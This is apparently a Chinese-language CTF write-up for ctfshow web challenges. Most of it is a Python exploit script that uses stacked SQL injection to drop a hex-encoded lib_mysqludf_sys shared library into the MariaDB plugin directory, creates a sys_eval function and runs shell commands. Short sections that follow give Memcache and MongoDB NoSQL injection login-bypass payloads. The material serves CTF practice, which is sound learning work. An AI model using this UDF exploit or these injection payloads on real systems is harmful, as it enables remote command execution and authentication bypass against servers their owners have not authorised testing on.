/api/?id=1'; select @@plugin_dir; -- -
查出Mysql插件路径:/usr/lib/mariadb/plugin/
/api/?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+
引入udf.so文件从而创建函数sys_eval
exp提权:
import requests
base_url="http://3f801e10-5c58-42bf-a5cf-8a588d3bfe9c.challenge.ctf.show:8080/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf = "7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400"
for i in range(0,21510, 5000):
end = i + 5000
payload.append(udf[i:end])
p = dict(zip(text, payload))
for t in text:
url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t) #UDF提权一般配合dumpfile 而不是outfile
r = requests.get(url)
print(r.status_code)
next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'-- +&page=1&limit=10" #将各个txt文件合并到udf.so
rn = requests.get(next_url)
uaf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"#创建udf函数
r=requests.get(uaf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');-- +&page=1&limit=10"#执行命令并查看
rnn = requests.get(nn_url)
print(rnn.text)
web249——NOSQL注入
参考文章:
NoSQL注入小笔记
冷门知识 — NoSQL注入知多少
搜一下Memcache::get
说传递数组即会返回第一个数组得元素
/api/?id[]=flag
web250
//sql语句
$query = new MongoDB\Driver\Query($data);
$cursor = $manager->executeQuery('ctfshow.ctfshow_user', $query)->toArray();
//返回逻辑,无过滤
if(count($cursor)>0){
$ret['msg']='登陆成功';
array_push($ret['data'], $flag);
}
NoSQL注入小笔记
冷门知识 — NoSQL注入知多少
MongoDB是NOSQL的一种,介绍一下Mongodb得两个操作符:
$ne:!= 不等于
$regex:正则匹配
username[$ne]=1&password[$ne]=1
username[$regex]=.&password[$regex]=.